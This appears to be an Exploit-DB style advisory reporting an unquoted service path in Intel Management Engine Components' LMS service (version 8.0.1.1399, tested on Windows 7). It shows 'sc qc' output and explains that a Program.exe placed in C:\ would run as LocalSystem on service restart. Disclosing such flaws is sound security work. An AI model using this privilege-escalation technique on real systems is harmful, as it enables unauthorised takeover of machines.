51 lines
No EOL
1.6 KiB
Text
51 lines
No EOL
1.6 KiB
Text
# Exploit Title: Intel(R) Management Engine Components - Unquoted Service Path Privilege Escalation
|
|
# Date: 10/19/2016
|
|
# Exploit Author: Joey Lane
|
|
# Version: 8.0.1.1399
|
|
# Tested on: Windows 7 Professional
|
|
|
|
The Intel(R) Management and Security Application Local Management Service (LMS) is installed with an unquoted service path.
|
|
This enables a local privilege escalation vulnerability.
|
|
To exploit this vulnerability, a local attacker can insert an executable file in the path of the service.
|
|
Rebooting the system or restarting the service will run the malicious executable with elevated privileges.
|
|
|
|
This was tested on version 8.0.1.1399, but other versions may be affected
|
|
as well.
|
|
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
C:\>sc qc LMS
|
|
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
|
|
|
|
SERVICE_NAME: LMS
|
|
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
|
|
START_TYPE : 2 AUTO_START (DELAYED)
|
|
|
|
ERROR_CONTROL : 1 NORMAL
|
|
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
|
|
|
|
LOAD_ORDER_GROUP :
|
|
|
|
TAG : 0
|
|
|
|
DISPLAY_NAME : Intel(R) Management and Security Application Local Management Service
|
|
|
|
DEPENDENCIES :
|
|
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
|
|
EXAMPLE:
|
|
|
|
Using the BINARY_PATH_NAME listed above as an example, an executable named
|
|
"Program.exe" could be placed in "C:\", and it would be executed as the
|
|
Local System user next time the service was restarted. |